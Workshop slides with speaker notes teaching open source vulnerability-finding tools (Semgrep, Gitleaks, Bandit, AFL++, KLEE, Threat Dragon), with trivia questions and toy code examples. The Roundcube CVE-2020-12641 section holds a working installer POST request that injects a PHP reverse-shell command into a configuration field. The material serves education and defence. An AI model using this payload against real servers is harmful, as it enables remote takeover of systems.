The Open Source Fortress

Goals

  • Finding a 0-day in the XZ codebase
  • Automating the 0-day exploitation to break into bug bounty targets at scale
  • Familiarizing yourself with unstable academic SotA PoCs and paid products

House rules

  • You watch. I do.
  • All questions should be asked at the end of the workshop.
  • The people staying until the end will get discount codes for the paid products.

Excited?

Buddy, the 0-day sounds cool. But paid products?

Goals v2.0

  • Finding vulnerabilities in a Goat-like application
  • Experimenting with stable, non-SotA, and effective open source tools
  • Understanding their advantages and disadvantages

House rules v2.0

  • You do. I watch.
  • You can ask your questions at any time.
  • Finding vulns and proposing patches will result in prizes!

Setup?

ossfortress.io/showcases/dc

Trivia 101 I

  • Prerequisite: You need to love improvisation.
  • Because Kahoot has a shitty pricing model, we'll use a classic form.
  • You gain points by:
    • Giving correct answers to trivia questions
    • Submitting patch ideas
  • We have 3 winners.
  • The books are randomly allocated at first, but you can exchange them among yourselves.

@iosifache

  • Ex-builder at MutableSecurity
  • Ex-security engineer @ Romanian Army and Canonical
  • Security engineer at Snap Inc.
  • Open source maintainer
  • GSoC mentor for OpenPrinting
  • Enthusiast of good coffee, long runs/hikes, and quality time

Roundcube Webmail

$ git clone https://github.com/roundcube/roundcubemail
[...]
$ cd roundcubemail
$ scc . | head -8
───────────────────────────────────────────────────────────────────────────────
Language                 Files     Lines   Blanks  Comments     Code Complexity
───────────────────────────────────────────────────────────────────────────────
PHP                        526    123939    18225     28447    77267      13323
SQL                        110      2642      419       238     1985          0
JavaScript                 100     29353     3617      2800    22936       4827
HTML                        50      2738      304        31     2403          0
Shell                       21      2432      345        50     2037        323

Trivia #1: What mechanism was missed by the Roundcube developers in the installation routine?

  1. Sanitizing the configuration
  2. Limiting the number of requests to the server
  3. Discarding the images in a non-standard format
  4. Receiving external emails

Exploitation chain

  • The attacker sends a POST request to the installer:

    POST /roundcube/installer/index.php HTTP/1.1
    Host: 192.168.243.153
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1049
    
    _step=2&_product_name=Roundcube+Webmail&***TRUNCATED***&submit=UPDATE+CONFIG&
    _im_convert_path=php+-r+'$sock%3dfsockopen("127.0.0.1",4444)%3b
    exec("/bin/bash+-i+<%263+>%263+2>%263")%3b'+%23
    
  • The attacker sends an email containing an image of non-standard format (e.g., TIFF).

  • Roundcube will try to convert the image to JPG.

  • The command stored in _im_convert_path will be executed.

  • The attacker will have a reverse shell.
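
To see what the installer ends up storing, the `_im_convert_path` value from the request above can be URL-decoded. This is a minimal Python sketch: the variable names are mine, and the string is copied from the truncated request on the slide with its line breaks joined.

```python
from urllib.parse import unquote_plus

# Value of _im_convert_path, copied from the request above (line breaks joined).
encoded = (
    "php+-r+'$sock%3dfsockopen(\"127.0.0.1\",4444)%3b"
    "exec(\"/bin/bash+-i+<%263+>%263+2>%263\")%3b'+%23"
)

# unquote_plus turns '+' into spaces and resolves the %XX escapes.
decoded = unquote_plus(encoded)
print(decoded)
```

The decoded value ends with `#`, which starts a shell comment, so anything appended after the stored value on the command line would be ignored.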

CVE-2020-12641

But ... Was it preventable?

Yes, but ...

Not with stock linters or scanners.

private static function getCommand($opt_name)
{
    static $error = [];

    $cmd = rcube::get_instance()->config->get($opt_name);

    if (empty($cmd)) {
        return false;
    }

    if (preg_match('/^(convert|identify)(\.exe)?$/i', $cmd)) {
        return $cmd;
    }

    // Executable must exist, also disallow network shares on Windows
    if ($cmd[0] != "\\" && file_exists($cmd)) {
        return $cmd;
    }

    if (empty($error[$opt_name])) {
        rcube::raise_error("Invalid $opt_name: $cmd", true, false);
        $error[$opt_name] = true;
    }

    return false;
}

From program/lib/Roundcube/rcube_image.php

Trivia #2: What technique could have been feasible for discovering the vulnerability?

  1. Fuzzing
  2. Taint analysis
  3. Linting
  4. Dependency scanning
rules:
  - id: return-unsanitised-config
    languages:
      - php
    message: A value taken from the configuration is returned without sanitisation.
    mode: taint
    pattern-sources:
      - patterns:
        - pattern: rcube::get_instance()->config->get($KEY);
    pattern-sanitizers:
      - pattern: escapeshellcmd(...)
    pattern-sinks:
    - patterns:
      - pattern-regex: "return"
    severity: ERROR

A Semgrep rule using taint tracking
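
The idea behind the rule (a value flows from a source to a sink unless it passes through a sanitiser) can be sketched in plain Python. This is a toy and not how Semgrep works internally: `get_config` and `shlex_quote` are hypothetical source and sanitiser names, the sink is any `return`, and the analysis ignores branches and aliasing.

```python
import ast

SOURCE = "get_config"      # hypothetical function that reads the configuration
SANITIZER = "shlex_quote"  # hypothetical function that neutralises shell input


class TaintVisitor(ast.NodeVisitor):
    """Flag `return` statements that return data derived from SOURCE."""

    def __init__(self):
        self.tainted = set()  # names currently holding tainted data
        self.findings = []    # line numbers of tainted returns

    @staticmethod
    def _is_call_to(node, name):
        return (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == name
        )

    def _is_tainted(self, node):
        if self._is_call_to(node, SANITIZER):
            return False  # sanitised values are considered clean
        if self._is_call_to(node, SOURCE):
            return True
        if isinstance(node, ast.Name):
            return node.id in self.tainted
        # Any tainted sub-expression taints the whole expression.
        return any(self._is_tainted(c) for c in ast.iter_child_nodes(node))

    def visit_FunctionDef(self, node):
        self.tainted = set()  # taint is tracked per function
        self.generic_visit(node)

    def visit_Assign(self, node):
        tainted = self._is_tainted(node.value)
        for target in node.targets:
            if isinstance(target, ast.Name):
                if tainted:
                    self.tainted.add(target.id)
                else:
                    self.tainted.discard(target.id)

    def visit_Return(self, node):
        if node.value is not None and self._is_tainted(node.value):
            self.findings.append(node.lineno)


def tainted_returns(code):
    visitor = TaintVisitor()
    visitor.visit(ast.parse(code))
    return visitor.findings


SAMPLE = '''
def get_command(option):
    cmd = get_config(option)
    if not cmd:
        return False
    return cmd

def get_safe_command(option):
    cmd = shlex_quote(get_config(option))
    return cmd
'''

print(tainted_returns(SAMPLE))
```

Only the `return cmd` in `get_command` is reported. The version that wraps the configuration value in the sanitiser is left alone, which mirrors the role of `pattern-sanitizers` in the rule.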


private static function getCommand($opt_name)
{
    static $error = [];

    $cmd = rcube::get_instance()->config->get($opt_name);

    if (empty($cmd)) {
        return false;
    }

    if (preg_match('/^(convert|identify)(\.exe)?$/i', $cmd)) {
        return $cmd;
    }

    // Executable must exist, also disallow network shares on Windows
    if ($cmd[0] != "\\" && file_exists($cmd)) {
        return $cmd;
    }

    [...]
}

The Open Source Fortress

  • Collection of OSS tools that can be used to proactively detect vulnerabilities
  • ossfortress.io/guide as the guide that we'll follow

But why open source?

  • Second layer of security when used with paid products
  • Replacement for paid products
  • Lower engineering effort compared with in-house solutions
  • Default collaboration

Further defensive activities

The examples are from the Log4Shell vulnerability in Log4j.

Further offensive activities

  • Exploit writing
    • Attack vector: through VMware Horizon
    • Mitigation bypass: T1036.004
    • Weaponisation: T1573.001
  • Exploitation

As reported by CISA in AA22-174A

Sand Castle

  • Vulnerable-by-design codebase
  • "lightweight piece of software that runs on a Debian-based server and allows users to control it through their browsers"
  • On-premise deployment
  • Written in Python and C
  • 12+ embedded vulnerabilities

Analysis infrastructure

  • Docker Compose infrastructure
  • Services
    • Sand Castle
    • OWASP Threat Dragon
    • Coder
    • All static analysers
    • AFL++
    • KLEE

Threat modelling

Trivia #3: What steps are part of a threat modelling process?

  1. Asset identification
  2. Creation of remediation plans in case of a cyberattack
  3. Cyber insurance procurement
  4. Threat identification

Trivia #4: Which country was the first to make threat modelling mandatory in certain conditions?

  1. Singapore
  2. Germany
  3. USA
  4. Switzerland

OWASP Threat Dragon

  • Threat modelling tool backed by OWASP
  • Usual process
    1. Threat model creation
    2. Diagram creation: STRIDE, CIA
    3. Asset representation: stores, processes, actors, data flows, trust boundaries
    4. Manual threat identification, with type, status, score, priority, description, and mitigation
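
The fields recorded for each threat in step 4 can be pictured as a small data structure. The sketch below is illustrative only: it is not Threat Dragon's file format, and the class names, status values, priority labels, and sample threats are all assumptions.

```python
from dataclasses import dataclass
from enum import Enum


class Stride(Enum):
    SPOOFING = "Spoofing"
    TAMPERING = "Tampering"
    REPUDIATION = "Repudiation"
    INFORMATION_DISCLOSURE = "Information disclosure"
    DENIAL_OF_SERVICE = "Denial of service"
    ELEVATION_OF_PRIVILEGE = "Elevation of privilege"


@dataclass
class Threat:
    asset: str          # diagram element the threat is attached to
    type: Stride
    status: str         # assumed values: "Open" or "Mitigated"
    score: float
    priority: str       # assumed values: "High", "Medium", "Low"
    description: str
    mitigation: str


PRIORITY_ORDER = {"High": 0, "Medium": 1, "Low": 2}


def open_threats(threats):
    """Return the threats still open, most urgent first."""
    pending = [t for t in threats if t.status == "Open"]
    return sorted(pending, key=lambda t: PRIORITY_ORDER[t.priority])


# Hypothetical entries for a web-controlled server such as Sand Castle.
model = [
    Threat("Web UI", Stride.SPOOFING, "Open", 6.5, "Medium",
           "Session cookie can be replayed", "Bind sessions to the client"),
    Threat("Command runner", Stride.ELEVATION_OF_PRIVILEGE, "Open", 9.0, "High",
           "User input reaches a shell", "Use argument lists, no shell"),
    Threat("Log store", Stride.TAMPERING, "Mitigated", 4.0, "Low",
           "Logs are world-writable", "Restrict file permissions"),
]

for threat in open_threats(model):
    print(threat.priority, threat.asset, threat.type.value)
```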

Practice 🔩

Code querying

Trivia #5: What is the purpose of a tool for code querying?

  1. Writing code implementing query languages such as SQL
  2. Storing code snippets in databases for debugging purposes
  3. Finding lines of code that match specific criteria
  4. Offering search engines the ability to search websites for code storage (e.g., GitHub, GitLab)

Trivia #6: What code querying tools are used nowadays for matching specific lines of code?

  1. Literals
  2. Regex
  3. Partial ASTs
  4. Tool-specific query languages

Semgrep

  • (Partially) open-source code scanner
  • Support for 30+ programming languages
  • No prior build requirements
  • No DSL for rules
  • Default or third-party rules
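
The difference between matching on text and matching on structure can be shown with Python's standard library alone. This is a rough sketch and not Semgrep itself: the sample code and the choice of `eval` as the thing to find are assumptions made for illustration.

```python
import ast
import re

CODE = '''
# eval is dangerous
result = eval(user_input)
message = "never call eval(x)"
'''

lines = list(enumerate(CODE.splitlines(), start=1))

# 1. Literal search: every line that mentions the word.
literal_hits = [n for n, line in lines if "eval" in line]

# 2. Regex search: lines where the word is followed by parentheses.
regex_hits = [n for n, line in lines if re.search(r"\beval\(.*\)", line)]

# 3. AST search: only real calls to a function named eval.
ast_hits = [
    node.lineno
    for node in ast.walk(ast.parse(CODE))
    if isinstance(node, ast.Call)
    and isinstance(node.func, ast.Name)
    and node.func.id == "eval"
]

print(literal_hits, regex_hits, ast_hits)
```

The literal search also hits the comment, the regex still hits the string literal, and only the AST query is limited to the actual call.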

Practice 🔩

Secret scanning

Trivia #7: What can be considered a secret?

  1. (Certain kinds of) API keys
  2. Credentials
  3. GitHub personal tokens
  4. Application build number

Trivia #8: How can artefacts that may be a secret be searched in a codebase?

  1. Short, high-entropy data
  2. Specific formats such as ghp_[A-Za-z0-9]{36}
  3. Prerequisites for running the application, usually mentioned in the docs
  4. Git history

Gitleaks

  • Detector for hard-coded secrets
  • Analysis of the entire Git history
  • Support for baselines and custom formats of secrets
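
Two common detection ideas, known formats and high entropy, can be sketched in a few lines of Python. This is not Gitleaks' implementation: the token pattern is my assumption of the classic GitHub token shape, the thresholds are arbitrary, and the sample token is made up. Scanning the Git history is left out.

```python
import math
import re
from collections import Counter

# Assumed format: "ghp_" followed by 36 alphanumeric characters.
TOKEN_PATTERN = re.compile(r"ghp_[A-Za-z0-9]{36}")
# Long runs of characters that typically appear in keys and tokens.
WORD_PATTERN = re.compile(r"[A-Za-z0-9+/=_-]{20,}")


def shannon_entropy(text):
    """Bits of entropy per character of the given string."""
    counts = Counter(text)
    total = len(text)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def find_candidates(line, threshold=4.0):
    """Return substrings of the line that look like secrets."""
    hits = [m.group(0) for m in TOKEN_PATTERN.finditer(line)]
    for word in WORD_PATTERN.findall(line):
        if word not in hits and shannon_entropy(word) >= threshold:
            hits.append(word)
    return hits


fake_token = "ghp_" + "a1B2c3D4e5F6g7H8i9J0k1L2m3N4o5P6q7R8"  # made-up value
print(find_candidates(f'TOKEN = "{fake_token}"'))
print(find_candidates("padding = 'aaaaaaaaaaaaaaaaaaaaaaaa'"))
```

The format rule catches the token regardless of its entropy, while the entropy rule ignores the long but repetitive padding string.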

Practice 🔩

Dependency scanning

Trivia #9: Should all the vulnerable dependencies be updated immediately?

  1. No, because some of them are not reachable or exploitable
  2. No, because development velocity is more important than absolute security
  3. Yes, because they are vulnerabilities in the code we are embedding in our codebase
  4. Yes, because it's unacceptable to have warnings from GitHub's Dependabot

Trivia #10: What files can be searched to identify the dependencies of a program?

  1. package.json
  2. The source files and their includes
  3. poetry.lock
  4. /etc/apache2/httpd.conf

Dependency scanning

  • Iterating through all dependencies to find their vulnerabilities
  • Usage of the dependencies' declaration list
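
The two bullets above can be sketched as: parse the declaration list, then look each pinned dependency up in an advisory database. Everything below is hypothetical (package names, advisory identifier, fixed version), and the in-memory dictionary only stands in for a real advisory database.

```python
# Hypothetical advisory data: package -> [(advisory id, first fixed version)].
ADVISORIES = {
    "examplelib": [("HYPOTHETICAL-0001", "2.0.0")],
}


def parse_requirements(text):
    """Parse `name==version` lines in the style of a requirements file."""
    deps = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if "==" not in line:
            continue  # unpinned entries are skipped in this sketch
        name, version = line.split("==", 1)
        deps[name.strip().lower()] = version.strip()
    return deps


def version_tuple(version):
    """Turn '1.4.2' into (1, 4, 2); assumes purely numeric versions."""
    return tuple(int(part) for part in version.split("."))


def scan(deps):
    """Return (package, version, advisory id) for each vulnerable pin."""
    findings = []
    for name, version in deps.items():
        for advisory_id, fixed in ADVISORIES.get(name, []):
            if version_tuple(version) < version_tuple(fixed):
                findings.append((name, version, advisory_id))
    return findings


REQUIREMENTS = """
examplelib==1.4.2  # pinned long ago
safelib==3.1.0
"""

print(scan(parse_requirements(REQUIREMENTS)))
```

A finding here only says that a vulnerable version is declared. Whether the vulnerable code is reachable is a separate question.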

OSV-Scanner

Practice 🔩

Linting

Trivia #11: What can a linter check?

  1. Formatting
  2. Developers' productivity
  3. Grammar (for example, non-inclusive expressions)
  4. Security

Trivia #12: What are valid approaches for automating the run of a linter?

  1. On quality gates inside the CI/CD
  2. Locally, in the development environment
  3. On Git's pre-commit hooks
  4. On each change of a file in an IDE

Bandit

  • Linter for Python
  • Abstract syntax tree representation of the code
  • Custom modules for:
    • Patterns of suspicious code
    • Deny lists of imports and function calls
    • Report generation
  • Support for baselines
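
A deny list applied to the abstract syntax tree can be sketched as follows. This is a simplified illustration and not Bandit's plugin API: the deny lists and the sample code are assumptions.

```python
import ast

DENIED_IMPORTS = {"pickle", "telnetlib"}  # assumed deny list of modules
DENIED_CALLS = {"eval", "exec"}           # assumed deny list of functions


def lint(code):
    """Return sorted (line, message) pairs for denied imports and calls."""
    issues = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in DENIED_IMPORTS:
                    issues.append((node.lineno, f"import of {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if node.module in DENIED_IMPORTS:
                issues.append((node.lineno, f"import from {node.module}"))
        elif isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name) and node.func.id in DENIED_CALLS:
                issues.append((node.lineno, f"call to {node.func.id}"))
    return sorted(issues)


SNIPPET = """import pickle
from json import loads
value = eval("1 + 1")
"""

for line, message in lint(SNIPPET):
    print(f"line {line}: {message}")
```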

Practice 🔩

Fuzzing

Trivia #13: What does a fuzzer do?

  1. Trying to deduce what code is unused
  2. Running the program with random input and watching for crashes
  3. Running the unit tests in a random order and watching for crashes
  4. Placing random data in the registers during execution and watching for crashes

Trivia #14: What metrics are used to judge how good a fuzzer is?

  1. Speed (executions/second)
  2. Filesystem interactions (interactions/second)
  3. Efficiency (coverage/second)
  4. Effectiveness (crashes/second)

From AdaCore's "Finding Vulnerabilities using Advanced Fuzz testing and AFLplusplus v3.0"
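
The basic loop of a fuzzer (mutate an input, run the target, record crashes) can be sketched in Python. This is a naive mutation fuzzer without the coverage feedback that AFL++ adds, and `parse_record` is a made-up target with a planted bug.

```python
import random


def parse_record(data):
    """Toy target: the first byte declares the payload length."""
    if not data:
        return 0
    declared = data[0]
    payload = data[1:]
    # Planted bug: the declared length is trusted without a bounds check.
    return payload[declared - 1] if declared else 0


def mutate(seed, rng):
    """Overwrite one random byte of the seed with a random value."""
    data = bytearray(seed)
    position = rng.randrange(len(data))
    data[position] = rng.randrange(256)
    return bytes(data)


def fuzz(target, seed, iterations=1000, rng_seed=0):
    """Run the target on mutated inputs and collect the crashing ones."""
    rng = random.Random(rng_seed)  # fixed seed keeps runs reproducible
    crashes = []
    for _ in range(iterations):
        candidate = mutate(seed, rng)
        try:
            target(candidate)
        except Exception as exc:
            crashes.append((candidate, type(exc).__name__))
    return crashes


crashes = fuzz(parse_record, seed=b"\x03abc")
print(len(crashes), "crashing inputs found")
```

Every crash comes from a mutated first byte larger than the payload length. A coverage-guided fuzzer would additionally keep the inputs that reach new code and mutate those further.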

AFL++

Practice 🔩

Symbolic execution

Trivia #15: What does symbolic execution do?

  1. Executing the application inside an emulator with an obscure architecture
  2. Investigating all paths in the control flow graph (CFG) by replacing the concrete values with symbolic ones
  3. Optimising binaries to run faster in production environments
  4. Running the program multiple times with random inputs

Trivia #16: What are the main components of a symbolic execution engine?

  1. Sources
  2. Sinks
  3. Patterns
  4. Secrets

int f(int a, int b) {
    int x = 1, y = 0;

    if (a != 0) {
        y = x + 3;
        if (b == 0) {
            x = 2 * (a + b);
        }
    }

    return (a + b) / (x - y);
}

From symflower's "What is symbolic execution for software programs"
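
For the function `f` above, the view of a symbolic execution engine can be approximated by listing each path with its condition and the symbolic value of the denominator `x - y`, then asking whether the denominator can be zero. The Python sketch below writes the three paths by hand and uses a brute-force search over small integers as a stand-in for a constraint solver. A real engine such as KLEE derives the paths and solves the constraints automatically.

```python
from itertools import product

# (path condition as text, condition, symbolic denominator x - y)
PATHS = [
    ("a == 0",
     lambda a, b: a == 0,
     lambda a, b: 1 - 0),                  # x = 1, y = 0
    ("a != 0 and b != 0",
     lambda a, b: a != 0 and b != 0,
     lambda a, b: 1 - (1 + 3)),            # x = 1, y = x + 3
    ("a != 0 and b == 0",
     lambda a, b: a != 0 and b == 0,
     lambda a, b: 2 * (a + b) - (1 + 3)),  # x = 2 * (a + b), y = 4
]


def find_division_by_zero(search_range=range(-5, 6)):
    """Return one (a, b) witness per path whose denominator can be zero."""
    witnesses = {}
    for label, condition, denominator in PATHS:
        for a, b in product(search_range, repeat=2):
            if condition(a, b) and denominator(a, b) == 0:
                witnesses[label] = (a, b)
                break
    return witnesses


print(find_division_by_zero())
```

Only the third path admits a zero denominator, with `a = 2` and `b = 0` as a concrete input that triggers it.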

KLEE

  • Generic symbolic execution with security use cases
  • Built on LLVM

Thanks, Cristian Cadar!

Practice 🔩

Security tooling automation

~8 billion people on Earth

~30k people at DEF CON

~30 people in this workshop

We probably have some things in common 😏, so let's not become strangers!

Connect form

Feedback form

Trivia #17: What is Ubuntu?

  1. Southern African Christian perception of an African philosophy
  2. Operating system
  3. Bantu word
  4. Philosophical concept

"Ubuntu does not mean that people should not address themselves, the question, therefore, is, are you going to do so in order to enable the community around you to be able to improve." - Nelson Mandela

Do security-focused work!

  • Create a threat model.
  • Do a security review and report your findings.
  • Implement new security mitigations.
  • Propose or backport patches.
  • Create new workflows for security scanning.
  • Integrate the project in OSS-Fuzz.

Support!

  • Give it a GitHub star.
  • Share it with your friends or followers.
  • Write a short feedback email to the maintainers.

ossfortress.io

- Before starting with the practical part, let's look at an example.

- Trying to gauge the adoption of the tool - Steady increase of stars

- What is Shodan? - 161k discovered hosts

- Familiar for owners of home labs - The web installation page of Roundcube - Plug the details in the browser, and they will be stored on the server.

- If the instance is exposed on the Internet, then anyone can set the details.

- The reason: custom functions that the standard tools do not know about by default

- Approach for output sanitisation (i.e., detecting if the configuration is returned without sanitisation) - Other approaches: input sanitisation (i.e., not storing in the configuration file without prior sanitisation)

- Seeing later how we can run Semgrep - Errors generated for the lines in red

Let's tackle the elephant in the room.

- Log4j - CVSS of 10 (critical) - CWE-502: Deserialisation of Untrusted Data - Links in the presentation, which will be accessible after the conference

- Identifiers from MITRE ATT&CK matrix - Symmetrically-encrypted channel communication - Mimicking a legit service

`scanf`, `scanf\(.*\)`, method call as revealed by the AST (as Joern does)

- Considering the program on the left - The right part is what a symbolic execution engine will see.

- Every engineer likes some automation.

- Open source workshop, about open source tools, so no corporate incentives involved - Spare time contributions - For personal development - Just 2 minutes to fill the form

I'm not promoting Ubuntu here. You may say that some of their decisions are questionable, but this is a discussion for another time. I think that Mark did an awesome job choosing the name of the operating system because the Ubuntu philosophy is also intrinsically embedded in open source.

- As mentioned at the beginning, these are not SotAs, so there is a lot of room for improvement. - In this way, I can bet that the whole community will be grateful for your work.

- If there is a single thing that I want you to remember, it is this website. - One can find there the presentation, exercises, a cheatsheet and more.